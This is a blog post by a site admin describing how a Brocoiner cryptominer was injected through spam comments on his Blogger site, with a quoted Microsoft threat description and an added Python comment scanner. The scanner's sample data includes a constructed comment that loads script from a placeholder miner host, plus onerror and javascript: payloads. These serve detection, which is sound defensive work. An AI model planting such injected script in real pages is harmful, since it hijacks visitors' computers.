Trojan : HTML/Brocoiner!rfn

Trojan : HTML/Brocoiner!rfn. Yes, this was the first time the admin was surprised to find this blog flagged for some kind of malware.

We also checked the blog theme, tracing the JavaScript code one by one, and found nothing suspicious.

We even assumed the browser itself might be infected with malware, but after opening our other website no antivirus alert appeared, so the browser was clean.

That meant we had to focus on finding the root of the problem on the rahmancyber.net website itself.
What was the real cause?

Even a scan on VirusTotal found no viruses on the website; it was reported as safe.

Let's try to trace the code CE94BF5164C04AE312403C4CA6A85F4F3B1133A2 from the antivirus detection, because when we searched for d4yukyzu.default we found no information about it.

As a result, we got information from friends abroad, through forum posts, that it is a bitcoin miner domain.

Then we also got information from Microsoft about the Trojan:


Windows Defender Antivirus detects and removes this threat.

This malware is a JavaScript cryptocurrency miner that is being served on web pages. When a computer visits one of these web pages, this JavaScript malware launches locally and uses the computer’s resources to mine cryptocurrency. Such mining activities can be resource intensive and can cause visiting computers to slow down.

Known samples of this malware have been observed mining Monero coin, a type of cryptocurrency. These samples were found in websites providing:

  • Streaming videos
  • Adult content
  • Shopping

Some sites hosting this malware appear legitimate and might have been compromised for this purpose.

==================

This gave us a bright spot: it turned out that the gap in Blogger comments that has existed so far can serve as a gateway for inserting script code.

Then we went through every comment, and it turned out there were comments about online poker and the like.
We simply cleaned them out and tested the website as a whole.
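A way to automate the comment sweep described above, as an added example that is not from the original post: it parses each comment body and flags script-like tags, inline event handlers and javascript:/data: URLs. The comment IDs and the miner domain are constructed placeholders, not indicators from the incident.

```python
"""Scan exported blog comments for injected script content (constructed example)."""
from html.parser import HTMLParser
from typing import Dict, List

# Tags and URL schemes that have no business inside a reader comment.
RISKY_TAGS = {"script", "iframe", "object", "embed"}
RISKY_SCHEMES = ("javascript:", "data:")


class CommentScanner(HTMLParser):
    """Collects suspicious constructs from one comment body."""

    def __init__(self):
        super().__init__()
        self.findings: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag in RISKY_TAGS:
            src = dict(attrs).get("src")
            self.findings.append(f"<{tag}> tag" + (f" loading {src}" if src else ""))
        for name, value in attrs:
            if name.startswith("on") and len(name) > 2:
                # onerror=, onload=, onclick= ... run script without a <script> tag
                self.findings.append(f"inline event handler {name} on <{tag}>")
            if value and value.strip().lower().startswith(RISKY_SCHEMES):
                self.findings.append(f"{name}={value!r} on <{tag}>")


def scan_comment(body: str) -> List[str]:
    """Return the list of findings for a single comment's HTML body."""
    scanner = CommentScanner()
    scanner.feed(body)
    scanner.close()
    return scanner.findings


def scan_comments(comments: Dict[str, str]) -> Dict[str, List[str]]:
    """Scan all comments; return {comment_id: findings} for flagged comments only."""
    return {cid: f for cid, body in comments.items() if (f := scan_comment(body))}


# Constructed sample comments; the miner domain is a placeholder, not a real indicator.
SAMPLE_COMMENTS = {
    "c1": "Great write-up, thanks for sharing!",
    "c2": 'Play <a href="http://poker-spam.example">online poker</a> now '
          '<script src="http://miner-placeholder.example/m.js"></script>',
    "c3": '<img src="x" onerror="mine()"> nice post',
    "c4": 'See <a href="javascript:void(0)">this</a>',
}

if __name__ == "__main__":
    for cid, findings in scan_comments(SAMPLE_COMMENTS).items():
        print(cid, "->", "; ".join(findings))
```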

As a result, the website is back to normal.
As a preventive measure, we no longer immediately publish every incoming comment; comments now require moderation approval, which we hope will reduce the appearance of spammers who stop by the RahmanCyber.net website.

Hopefully this can be a lesson for fellow bloggers: activate the comment restriction feature on your website, or turn off the autoscripting function in the comment box.

==========
RahmanCyber ​​NET Admin Note 12/4/2017



Created by Ipadguides in category Blog